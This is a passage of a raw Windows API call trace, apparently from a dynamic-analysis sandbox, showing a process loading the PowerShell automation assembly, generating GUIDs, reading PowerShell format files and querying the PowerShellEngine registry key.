lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.428] GetLastError () returned 0x0 [0145.428] VirtualQuery (in: lpAddress=0x2dcfd4, lpBuffer=0x2ddfd4, dwLength=0x1c | out: lpBuffer=0x2ddfd4*(BaseAddress=0x2dc000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.428] VirtualQuery (in: lpAddress=0x2dd010, lpBuffer=0x2de010, dwLength=0x1c | out: lpBuffer=0x2de010*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.431] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x1af644ea, Data2=0x98d, Data3=0x480d, Data4=([0]=0x95, [1]=0x7a, [2]=0xa8, [3]=0xfe, [4]=0x94, [5]=0x7a, [6]=0x31, [7]=0x5))) returned 0x0 [0145.431] VirtualQuery (in: lpAddress=0x2dd3a4, lpBuffer=0x2de3a4, dwLength=0x1c | out: lpBuffer=0x2de3a4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.456] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xaaa8ccdf, Data2=0xa8cb, Data3=0x4248, Data4=([0]=0x83, [1]=0xad, [2]=0x87, [3]=0xce, [4]=0x23, [5]=0x87, [6]=0x56, [7]=0x33))) returned 0x0 [0145.457] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x819218c5, Data2=0xdc32, Data3=0x4e33, Data4=([0]=0x9a, [1]=0xc9, [2]=0xa0, [3]=0x71, [4]=0xba, [5]=0xde, [6]=0x25, [7]=0xbe))) returned 0x0 [0145.458] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xede08bfa, Data2=0x8ea0, Data3=0x4cb1, Data4=([0]=0x92, [1]=0x49, [2]=0xdc, [3]=0x1a, [4]=0x54, [5]=0xc8, [6]=0x88, [7]=0x33))) returned 0x0 [0145.458] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xc1971e40, Data2=0x8d6a, Data3=0x4f95, Data4=([0]=0xa3, [1]=0x76, [2]=0x1b, [3]=0x2e, [4]=0xdc, [5]=0x21, [6]=0x36, [7]=0xb3))) returned 0x0 [0145.458] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xeda46046, Data2=0x74c7, Data3=0x499f, Data4=([0]=0x95, [1]=0x67, [2]=0x53, [3]=0x7, [4]=0xf3, [5]=0x87, [6]=0x30, [7]=0xa8))) returned 0x0 [0145.459] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xda91eda6, Data2=0x2f06, Data3=0x4f0b, Data4=([0]=0xac, [1]=0x36, [2]=0x65, [3]=0xd, [4]=0x51, [5]=0xb0, [6]=0x9, [7]=0x5f))) returned 0x0 [0145.459] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xb36b69b4, Data2=0xff2e, Data3=0x4eb9, Data4=([0]=0x80, [1]=0x48, [2]=0x9a, [3]=0x8e, [4]=0xad, [5]=0xb, [6]=0x82, [7]=0x27))) returned 0x0 [0145.459] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x6b14191a, Data2=0x8329, Data3=0x408e, Data4=([0]=0x97, [1]=0x5e, [2]=0xc4, [3]=0x4a, [4]=0x8c, [5]=0xd1, [6]=0x8d, [7]=0x1b))) returned 0x0 [0145.459] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xb9a56143, Data2=0x80a, Data3=0x44ed, Data4=([0]=0xb0, [1]=0xc1, [2]=0xa6, [3]=0x54, [4]=0xb8, [5]=0x44, [6]=0x3b, [7]=0x1f))) returned 0x0 [0145.460] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c [0145.460] GetLastError () returned 0x0 [0145.460] GetFileType (hFile=0x34c) returned 0x1 [0145.460] SetErrorMode (uMode=0x1) returned 0x1 [0145.460] GetFileType (hFile=0x34c) returned 0x1 [0145.460] ReadFile (in: hFile=0x34c, lpBuffer=0x33183a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33183a4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.504] GetLastError () returned 0x0 [0145.504] ReadFile (in: hFile=0x34c, lpBuffer=0x33183a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33183a4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.504] GetLastError () returned 0x0 [0145.504] ReadFile (in: hFile=0x34c, lpBuffer=0x33183a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33183a4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.504] GetLastError () returned 0x0 [0145.505] ReadFile (in: hFile=0x34c, lpBuffer=0x33183a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33183a4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.505] GetLastError () returned 0x0 [0145.505] ReadFile (in: hFile=0x34c, lpBuffer=0x33183a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33183a4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.505] GetLastError () returned 0x0 [0145.505] ReadFile (in: hFile=0x34c, lpBuffer=0x33183a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33183a4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.505] GetLastError () returned 0x0 [0145.505] ReadFile (in: hFile=0x34c, lpBuffer=0x33183a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33183a4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.505] GetLastError () returned 0x0 [0145.505] ReadFile (in: hFile=0x34c, lpBuffer=0x33183a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33183a4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.505] GetLastError () returned 0x0 [0145.505] ReadFile (in: hFile=0x34c, lpBuffer=0x33183a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33183a4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.505] GetLastError () returned 0x0 [0145.506] ReadFile (in: hFile=0x34c, lpBuffer=0x33183a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33183a4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.506] GetLastError () returned 0x0 [0145.506] ReadFile (in: hFile=0x34c, lpBuffer=0x33183a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33183a4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.506] GetLastError () returned 0x0 [0145.507] ReadFile (in: hFile=0x34c, lpBuffer=0x33183a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33183a4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.507] GetLastError () returned 0x0 [0145.507] ReadFile (in: hFile=0x34c, lpBuffer=0x33183a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33183a4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.507] GetLastError () returned 0x0 [0145.507] ReadFile (in: hFile=0x34c, lpBuffer=0x33183a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33183a4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.507] GetLastError () returned 0x0 [0145.507] ReadFile (in: hFile=0x34c, lpBuffer=0x33183a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33183a4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.507] GetLastError () returned 0x0 [0145.507] ReadFile (in: hFile=0x34c, lpBuffer=0x33183a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33183a4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.507] GetLastError () returned 0x0 [0145.507] ReadFile (in: hFile=0x34c, lpBuffer=0x33183a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33183a4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.507] GetLastError () returned 0x0 [0145.509] ReadFile (in: hFile=0x34c, lpBuffer=0x33183a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33183a4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.509] GetLastError () returned 0x0 [0145.509] ReadFile (in: hFile=0x34c, lpBuffer=0x33183a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33183a4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.509] GetLastError () returned 0x0 [0145.509] ReadFile (in: hFile=0x34c, lpBuffer=0x33183a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33183a4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.509] GetLastError () returned 0x0 [0145.509] ReadFile (in: hFile=0x34c, lpBuffer=0x33183a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33183a4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.509] GetLastError () returned 0x0 [0145.509] ReadFile (in: hFile=0x34c, lpBuffer=0x33183a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33183a4*, lpNumberOfBytesRead=0x2de734*=0xe67, lpOverlapped=0x0) returned 1 [0145.509] GetLastError () returned 0x0 [0145.509] ReadFile (in: hFile=0x34c, lpBuffer=0x33179ab, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33179ab*, lpNumberOfBytesRead=0x2de734*=0x0, lpOverlapped=0x0) returned 1 [0145.509] GetLastError () returned 0x0 [0145.509] ReadFile (in: hFile=0x34c, lpBuffer=0x33183a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x33183a4*, lpNumberOfBytesRead=0x2de734*=0x0, lpOverlapped=0x0) returned 1 [0145.509] GetLastError () returned 0x0 [0145.510] CloseHandle (hObject=0x34c) returned 1 [0145.510] GetLastError () returned 0x0 [0145.510] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de6b8 | out: phkResult=0x2de6b8*=0x34c) returned 0x0 [0145.510] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de700, lpData=0x0, lpcbData=0x2de6fc*=0x0 | out: lpType=0x2de700*=0x1, lpData=0x0, lpcbData=0x2de6fc*=0x56) returned 0x0 [0145.510] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de700, lpData=0x3da558, lpcbData=0x2de6fc*=0x56 | out: lpType=0x2de700*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2de6fc*=0x56) returned 0x0 [0145.511] RegCloseKey (hKey=0x34c) returned 0x0 [0145.513] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xb62b4860, Data2=0x6bc7, Data3=0x4b2c, Data4=([0]=0xa8, [1]=0xed, [2]=0x8f, [3]=0xb0, [4]=0x28, [5]=0x2a, [6]=0x8b, [7]=0xab))) returned 0x0 [0145.513] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x8acdacd6, Data2=0x5f52, Data3=0x4b13, Data4=([0]=0xbd, [1]=0x64, [2]=0x26, [3]=0x44, [4]=0xd3, [5]=0xd4, [6]=0x8d, [7]=0x2b))) returned 0x0 [0145.513] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x79d73c25, Data2=0x3b3d, Data3=0x44bd, Data4=([0]=0x9d, [1]=0xf, [2]=0xab, [3]=0x48, [4]=0xa7, [5]=0x66, [6]=0x7b, [7]=0xf5))) returned 0x0 [0145.513] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x55f4c8c6, Data2=0x60da, Data3=0x4d24, Data4=([0]=0xa2, [1]=0x58, [2]=0x8f, [3]=0x43, [4]=0x5, [5]=0xf3, [6]=0x15, [7]=0x26))) returned 0x0 [0145.514] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xc046961b, Data2=0xefb7, Data3=0x4570, Data4=([0]=0xab, [1]=0xc2, [2]=0x6d, [3]=0xe4, [4]=0x29, [5]=0x58, [6]=0x1a, [7]=0xb4))) returned 0x0 [0145.514] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x5af390f8, Data2=0x6d55, Data3=0x4783, Data4=([0]=0x97, [1]=0x9c, [2]=0x81, [3]=0x8f, [4]=0x6f, [5]=0xe8, [6]=0x26, [7]=0x29))) returned 0x0 [0145.514] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x570763c1, Data2=0x33f8, Data3=0x46d4, Data4=([0]=0x8b, [1]=0x68, [2]=0x8c, [3]=0x6d, [4]=0x80, [5]=0xf4, [6]=0x68, [7]=0x50))) returned 0x0 [0145.514] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x4a373abf, Data2=0xe3f0, Data3=0x4be3, Data4=([0]=0xa3, [1]=0x6e, [2]=0x6c, [3]=0x15, [4]=0xb4, [5]=0xe8, [6]=0x93, [7]=0xac))) returned 0x0 [0145.514] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x3fcd6e24, Data2=0xaf6a, Data3=0x4cd4, Data4=([0]=0x93, [1]=0x2c, [2]=0x6e, [3]=0xdf, [4]=0xe6, [5]=0x83, [6]=0xaa, [7]=0xa9))) returned 0x0 [0145.514] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x5a6a7da5, Data2=0x56f4, Data3=0x4ccf, Data4=([0]=0x8f, [1]=0x7a, [2]=0xb5, [3]=0xc4, [4]=0x87, [5]=0x50, [6]=0x1f, [7]=0x57))) returned 0x0 [0145.514] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x27833343, Data2=0xa9b6, Data3=0x4418, Data4=([0]=0xa4, [1]=0xe8, [2]=0xb, [3]=0xd3, [4]=0xfd, [5]=0x3, [6]=0x45, [7]=0x63))) returned 0x0 [0145.515] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xea0eb828, Data2=0xa35c, Data3=0x4440, Data4=([0]=0xb9, [1]=0x55, [2]=0xa1, [3]=0x89, [4]=0x91, [5]=0x5c, [6]=0xdc, [7]=0xf0))) returned 0x0 [0145.515] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xca7003be, Data2=0x4047, Data3=0x4aed, Data4=([0]=0xb1, [1]=0x5e, [2]=0x1a, [3]=0x58, [4]=0x75, [5]=0xc, [6]=0x6, [7]=0x90))) returned 0x0 [0145.515] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x760d23a9, Data2=0xfdd7, Data3=0x40ad, Data4=([0]=0xa6, [1]=0xea, [2]=0x17, [3]=0x4a, [4]=0xca, [5]=0x79, [6]=0x56, [7]=0xab))) returned 0x0 [0145.515] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x5c97ce59, Data2=0x8d98, Data3=0x4b23, Data4=([0]=0x90, [1]=0x70, [2]=0x18, [3]=0xca, [4]=0x4f, [5]=0x69, [6]=0xe2, [7]=0x90))) returned 0x0 [0145.515] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x47c5837a, Data2=0x3827, Data3=0x46b2, Data4=([0]=0xb9, [1]=0xdf, [2]=0xd, [3]=0xc4, [4]=0x4a, [5]=0xed, [6]=0x3d, [7]=0xf8))) returned 0x0 [0145.515] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x298a817e, Data2=0xff6a, Data3=0x4cbe, Data4=([0]=0xb5, [1]=0xc4, [2]=0x1c, [3]=0xf9, [4]=0xde, [5]=0x5d, [6]=0xd6, [7]=0xbd))) returned 0x0 [0145.515] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x8ead96b2, Data2=0xbf8, Data3=0x49f8, Data4=([0]=0xa9, [1]=0xee, [2]=0xd3, [3]=0x3d, [4]=0x95, [5]=0xe1, [6]=0x5b, [7]=0x4f))) returned 0x0 [0145.516] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xbacae280, Data2=0xd178, Data3=0x40f3, Data4=([0]=0xa3, [1]=0x4e, [2]=0x30, [3]=0x92, [4]=0xf0, [5]=0x69, [6]=0xce, [7]=0x13))) returned 0x0 [0145.516] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x186e6cfa, Data2=0x99f, Data3=0x4221, Data4=([0]=0x97, [1]=0xe0, [2]=0xda, [3]=0xc7, [4]=0x67, [5]=0x4d, [6]=0xf1, [7]=0x28))) returned 0x0 [0145.516] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xe27783cd, Data2=0xfa92, Data3=0x4c83, Data4=([0]=0xad, [1]=0x51, [2]=0x60, [3]=0x56, [4]=0xdc, [5]=0x0, [6]=0x34, [7]=0x31))) returned 0x0 [0145.516] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x7258809c, Data2=0x2682, Data3=0x453d, Data4=([0]=0x87, [1]=0xeb, [2]=0x94, [3]=0x59, [4]=0x4f, [5]=0xb6, [6]=0xb6, [7]=0x98))) returned 0x0 [0145.517] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xde720e35, Data2=0x82b4, Data3=0x4172, Data4=([0]=0x88, [1]=0x4f, [2]=0x8f, [3]=0xd6, [4]=0xcc, [5]=0xef, [6]=0xa9, [7]=0xa0))) returned 0x0 [0145.517] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x68dead9e, Data2=0x1413, Data3=0x4765, Data4=([0]=0xa5, [1]=0x29, [2]=0x50, [3]=0xfc, [4]=0xf8, [5]=0xa7, [6]=0xa8, [7]=0x77))) returned 0x0 [0145.517] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x69c1d61c, Data2=0xcd7e, Data3=0x4fe8, Data4=([0]=0x98, [1]=0x4, [2]=0xc3, [3]=0x71, [4]=0xb0, [5]=0x1f, [6]=0xba, [7]=0xbb))) returned 0x0 [0145.517] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xc175b795, Data2=0x935f, Data3=0x45f5, Data4=([0]=0xbb, [1]=0xc1, [2]=0x44, [3]=0xc7, [4]=0xa2, [5]=0x2c, [6]=0x75, [7]=0xb2))) returned 0x0 [0145.517] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xa63aae43, Data2=0x84a, Data3=0x4acf, Data4=([0]=0x9c, [1]=0x4a, [2]=0x8a, [3]=0xb7, [4]=0xbb, [5]=0xc, [6]=0xf3, [7]=0x29))) returned 0x0 [0145.517] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x5d0242f0, Data2=0x801b, Data3=0x4ae6, Data4=([0]=0x80, [1]=0x17, [2]=0x5f, [3]=0xe5, [4]=0xc9, [5]=0x85, [6]=0x22, [7]=0x52))) returned 0x0 [0145.517] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x59a68ed, Data2=0xe2f0, Data3=0x4876, Data4=([0]=0x8e, [1]=0xc4, [2]=0x7d, [3]=0xe, [4]=0x8e, [5]=0x84, [6]=0x6a, [7]=0x2b))) returned 0x0 [0145.517] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xca31cd7b, Data2=0x76d9, Data3=0x4069, Data4=([0]=0x9c, [1]=0x73, [2]=0x13, [3]=0xa9, [4]=0x6d, [5]=0xa6, [6]=0xbc, [7]=0xcb))) returned 0x0 [0145.517] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x96cc6e47, Data2=0x15ba, Data3=0x4718, Data4=([0]=0xb3, [1]=0x1f, [2]=0xc, [3]=0x9b, [4]=0x4e, [5]=0x4f, [6]=0x42, [7]=0x32))) returned 0x0 [0145.517] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x43ac46a6, Data2=0xce31, Data3=0x4957, Data4=([0]=0x95, [1]=0xa2, [2]=0xd, [3]=0x3b, [4]=0x7c, [5]=0x90, [6]=0xcc, [7]=0xe4))) returned 0x0 [0145.518] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xddbb9cbb, Data2=0xdaf3, Data3=0x4afd, Data4=([0]=0x9f, [1]=0xc2, [2]=0x74, [3]=0x2a, [4]=0xa9, [5]=0xee, [6]=0x98, [7]=0xb0))) returned 0x0 [0145.520] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x44b2a481, Data2=0xaea9, Data3=0x42d4, Data4=([0]=0xb8, [1]=0x3e, [2]=0x13, [3]=0xcb, [4]=0x3, [5]=0x5f, [6]=0x67, [7]=0x94))) returned 0x0 [0145.520] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x295426e, Data2=0xa93e, Data3=0x4338, Data4=([0]=0x87, [1]=0xc0, [2]=0xe4, [3]=0x19, [4]=0x8, [5]=0x94, [6]=0xfb, [7]=0xd1))) returned 0x0 [0145.520] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xeaa3ec52, Data2=0x93d0, Data3=0x4108, Data4=([0]=0x93, [1]=0x4e, [2]=0x8a, [3]=0xa6, [4]=0xe8, [5]=0xec, [6]=0x5e, [7]=0x94))) returned 0x0 [0145.520] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xd36f8d99, Data2=0x5667, Data3=0x435d, Data4=([0]=0x83, [1]=0x91, [2]=0x6e, [3]=0xaa, [4]=0x14, [5]=0x43, [6]=0x95, [7]=0x2a))) returned 0x0 [0145.520] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xb9a1c164, Data2=0x72, Data3=0x49e4, Data4=([0]=0xbe, [1]=0x3b, [2]=0x1f, [3]=0x7c, [4]=0xbf, [5]=0x46, [6]=0xb9, [7]=0x0))) returned 0x0 [0145.521] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xe9ce5b18, Data2=0xb110, Data3=0x44de, Data4=([0]=0xbc, [1]=0x4c, [2]=0x41, [3]=0x12, [4]=0xf5, [5]=0x54, [6]=0x2e, [7]=0x52))) returned 0x0 [0145.521] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x4ec8be8a, Data2=0xf5d6, Data3=0x43a8, Data4=([0]=0x8c, [1]=0x37, [2]=0x73, [3]=0x34, [4]=0x73, [5]=0x52, [6]=0x2c, [7]=0x70))) returned 0x0 [0145.521] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x7d124a5, Data2=0xcd42, Data3=0x478c, Data4=([0]=0x87, [1]=0x1b, [2]=0x8f, [3]=0x3c, [4]=0x5c, [5]=0x8b, [6]=0x3f, [7]=0xfa))) returned 0x0 [0145.521] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x103eb6f5, Data2=0x10e9, Data3=0x4d0b, Data4=([0]=0x82, [1]=0x19, [2]=0x25, [3]=0x3a, [4]=0x26, [5]=0x81, [6]=0x60, [7]=0xb6))) returned 0x0 [0145.521] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x9f3be68c, Data2=0xd5b9, Data3=0x497d, Data4=([0]=0x97, [1]=0x21, [2]=0x44, [3]=0x68, [4]=0x41, [5]=0x1e, [6]=0xe5, [7]=0x1a))) returned 0x0 [0145.521] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x328ef3b6, Data2=0xcfd0, Data3=0x4f86, Data4=([0]=0xa6, [1]=0x5f, [2]=0x5a, [3]=0x88, [4]=0xc4, [5]=0x9a, [6]=0x21, [7]=0x26))) returned 0x0 [0145.522] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x9a910871, Data2=0xf38a, Data3=0x47ae, Data4=([0]=0x89, [1]=0x1d, [2]=0x98, [3]=0x67, [4]=0x5b, [5]=0xda, [6]=0xb8, [7]=0xae))) returned 0x0 [0145.522] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x8fe55562, Data2=0x7e03, Data3=0x46ae, Data4=([0]=0x9d, [1]=0x4, [2]=0xf5, [3]=0xc8, [4]=0x8b, [5]=0x13, [6]=0x35, [7]=0x28))) returned 0x0 [0145.522] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x2a035c29, Data2=0x3de1, Data3=0x449c, Data4=([0]=0xaa, [1]=0x29, [2]=0xfb, [3]=0x8f, [4]=0xa1, [5]=0xd9, [6]=0xec, [7]=0x55))) returned 0x0 [0145.522] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x7eec0770, Data2=0x8a06, Data3=0x476a, Data4=([0]=0x82, [1]=0xe3, [2]=0xe9, [3]=0x47, [4]=0x5c, [5]=0xc2, [6]=0x12, [7]=0x8))) returned 0x0 [0145.523] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c [0145.523] GetLastError () returned 0x0 [0145.523] GetFileType (hFile=0x34c) returned 0x1 [0145.523] SetErrorMode (uMode=0x1) returned 0x1 [0145.523] GetFileType (hFile=0x34c) returned 0x1 [0145.523] ReadFile (in: hFile=0x34c, lpBuffer=0x3408d7c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3408d7c*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.529] GetLastError () returned 0x0 [0145.557] ReadFile (in: hFile=0x34c, lpBuffer=0x3408d7c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3408d7c*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.557] GetLastError () returned 0x0 [0145.557] ReadFile (in: hFile=0x34c, lpBuffer=0x3408d7c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: 